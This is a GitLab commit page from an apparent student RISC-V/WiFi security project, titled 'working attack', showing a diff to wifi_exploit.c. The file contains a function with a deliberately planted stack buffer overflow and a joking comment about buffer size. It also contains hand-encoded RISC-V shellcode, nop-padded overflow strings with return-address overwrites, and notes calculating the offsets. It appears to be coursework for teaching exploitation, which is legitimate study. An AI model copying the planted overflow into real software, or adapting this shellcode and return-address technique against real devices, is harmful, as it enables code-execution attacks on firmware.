Skip to content
GitLab
Explore
Sign in
Primary navigation
Search or go to…
Project
R
risc-v-wifi
Manage
Activity
Members
Labels
Plan
Issues
Issue boards
Milestones
Iterations
Wiki
Requirements
Code
Merge requests
Repository
Branches
Commits
Tags
Repository graph
Compare revisions
Snippets
Locked files
Build
Pipelines
Jobs
Pipeline schedules
Test cases
Artifacts
Deploy
Releases
Package registry
Container registry
Model registry
Operate
Environments
Terraform modules
Monitor
Incidents
Analyze
Value stream analytics
Contributor analytics
CI/CD analytics
Repository analytics
Code review analytics
Issue analytics
Insights
Model experiments
Help
Help
Support
GitLab documentation
Compare GitLab plans
Community forum
Contribute to GitLab
Provide feedback
Keyboard shortcuts
?
Snippets
Groups
Projects
Show more breadcrumbs
SWPws2020
risc-v-wifi
Commits
2cb7e6b4
Commit
2cb7e6b4
authored
4 years ago
by
fptk
Browse files
Options
Downloads
Patches
Plain Diff
working attack
parent
60880cec
Branches
Branches containing commit
No related tags found
No related merge requests found
Changes
1
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
sifive_software/src/wifi_exploit.c
+46
-59
46 additions, 59 deletions
sifive_software/src/wifi_exploit.c
with
46 additions
and
59 deletions
sifive_software/src/wifi_exploit.c
+
46
−
59
View file @
2cb7e6b4
...
@@ -78,7 +78,7 @@ int is_target(char *test) {
...
@@ -78,7 +78,7 @@ int is_target(char *test) {
char
*
attack_me
(
char
*
data
,
uint32_t
data_len
)
{
char
*
attack_me
(
char
*
data
,
uint32_t
data_len
)
{
// nobody could possibly enter a name longer than 20 characters, so this buffer
// nobody could possibly enter a name longer than 20 characters, so this buffer
// is definitely large enough
// is definitely large enough
char
message
[
28
];
char
message
[
1
28
];
memset
(
message
,
'B'
,
sizeof
(
message
));
memset
(
message
,
'B'
,
sizeof
(
message
));
memcpy
(
message
,
"Hallo, "
,
7
);
memcpy
(
message
,
"Hallo, "
,
7
);
if
(
strncmp
(
data
,
get_target
(),
strlen
(
get_target
()))
==
0
)
{
if
(
strncmp
(
data
,
get_target
(),
strlen
(
get_target
()))
==
0
)
{
...
@@ -86,7 +86,7 @@ char *attack_me(char *data, uint32_t data_len) {
...
@@ -86,7 +86,7 @@ char *attack_me(char *data, uint32_t data_len) {
snprintf
(
message
+
13
,
14
,
" ist korrekt!"
);
snprintf
(
message
+
13
,
14
,
" ist korrekt!"
);
}
}
else
{
else
{
memcpy
(
message
+
7
,
data
,
strlen
(
data
)
+
2
);
memcpy
(
message
+
7
,
data
,
data_len
);
}
}
char
*
result
=
malloc
(
strlen
(
message
)
+
1
);
char
*
result
=
malloc
(
strlen
(
message
)
+
1
);
...
@@ -114,63 +114,50 @@ int main(void) {
...
@@ -114,63 +114,50 @@ int main(void) {
spi_init
(
SPICLOCK_80KHZ
);
spi_init
(
SPICLOCK_80KHZ
);
//char *attack = "a12342234324452346234723482349234HAHA\x80\x12\x01\x20\xca\x13\x01\x20";
char
*
attack
=
"sBAUM"
;
//buffer address
char
*
revattack
=
"a"
/*
* RISC SPEICHER:
"
\x37\x05\x01\x20
"
// 0: lui a0,0x20010
* MSB LSB
"
\x13\x05\xc5\x55
"
// 4: addi a0,a0,1372 # 0x2001055c
* 6C6C6148 = 'Hall' | 6c =108 = l
"
\x13\x0e\x00\x00
"
// 8: li t3,0
http://csci206sp2020.courses.bucknell.edu/files/2020/01/riscv-card.pdf
"
\x37\x1e\x01\x20
"
// c: lui t3,0x20011
lsb MSB
"
\x13\x0e\xce\x45
"
// 10: addi t3,t3,1116 # 0x2001145c
0 ...... 31
"
\xe7\x0e\x0e\x00
"
// 14: jalr t4,t3
Lui a5,0x80001
"
\x13\x00\x00\x00
"
// 18: nop
0110 1110 0001 1111 0011 1000 1000 0001
HEX=\x6e\x1f\x38\x81
"
\x13\x00\x00\x00
"
// 20: nop
"
\x13\x00\x00\x00
"
// 20: nop
"
\x13\x00\x00\x00
"
lw a5, -1375(a5) //1 less than in orig bin, otherwise 0 byte in payload
"
\x13\x00\x00\x00
"
opcode rd f3 rs1 immediate
"
\x13\x00\x00\x00
"
00000011 01110 010 01110 101010100001
"
\x13\x00\x00\x00
"
0000 0110 1110 0100 1110 1010 1010 0001
"
\x13\x00\x00\x00
"
HEX=\x06\xe4\xea\xa1
"
\x13\x00\x00\x00
"
"
\x13\x00\x00\x00
"
"
\x13\x00\x00\x00
"
addi a0, 15, 1
"
\x13\x00\x00\x00
"
opcode rd f3 rs1 immediate
"
\x13\x00\x00\x00
"
0010011 01010 000 01110 000000000001
"
\x13\x00\x00\x00
"
0010 0110 1010 0000 1110 0000 0000 0001
"
\x13\x00\x00\x00
"
HEX=\x26\xa0\xe0\x01
"
\x13\x00\x00\x00
"
"
\x13\x00\x00\x00
"
"
\x13\x00\x00\x00
"
jal 0 offset
"
\x13\x00\x00\x00
"
jal 0 0x200113ca
"
\x13\x00\x00\x00
"
1101111 00000 100000000000010001001111001010
"
\x13\x00\x00\x00
"
1101 1110 0000 0001 0001 0011 1100 1010
"
\x13\x00\x00\x00
"
HEX=\xde\x01\x13\xca
"
\x13\x00\x00\x00
"
"
\x13\x00\x00\x00
"
--> the assembly dump is:
"
\x13\x00\x00\x00
"
lui a5, 0x80001
"
\x13\x00\x00\x00
"
lw a5, -1376(a5)
"
\x13\x00\x00\x00
"
addi a0,15,0 == mv a0,a5
jal 0 offset
"
\xe4\x0e\x00\x80
"
which results in hexdump:
"
\xe4\x0e\x00\x80
"
;
\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca
char
*
result
=
attack_me
(
revattack
,
141
);
that is 4 instructions each 4 bytes.
//char *result = attack_me(attack, 120);
The buffer has 28 Bytes
printf
(
"result: %s"
,
result
);
The return address to overwrite lies at buffer+44 Bytes.
44-16-7=21 Bytes of garbage (-7 for "Hallo, ")
the new return address:
\x38\x0f\x00\x80
*/
char
*
attack
=
"a0aaa1aaa2aaa3aaa
\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca\x12\x23\x34\x45\x50\x0f\x00\x80
"
;
char
*
revattack
=
"a0aaa1aaa2aaa3aaa
\x81\x38\x1f\x6e\xa1\xea\xe4\x06\x01\xe0\xa0\x26\xca\x13\x01\xde\x45\x34\x23\x12\x58\x0f\x00\x80
"
;
char
*
result
=
attack_me
(
revattack
,
26
);
printf
(
"%s"
,
result
);
/*
/*
if(webserver_init(ESP32_NETWORK_IMPLEMENTATION) != 0) {
if(webserver_init(ESP32_NETWORK_IMPLEMENTATION) != 0) {
...
...
This diff is collapsed.
Click to expand it.
Preview
0%
Loading
Try again
or
attach a new file
.
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Save comment
Cancel
Please
register
or
sign in
to comment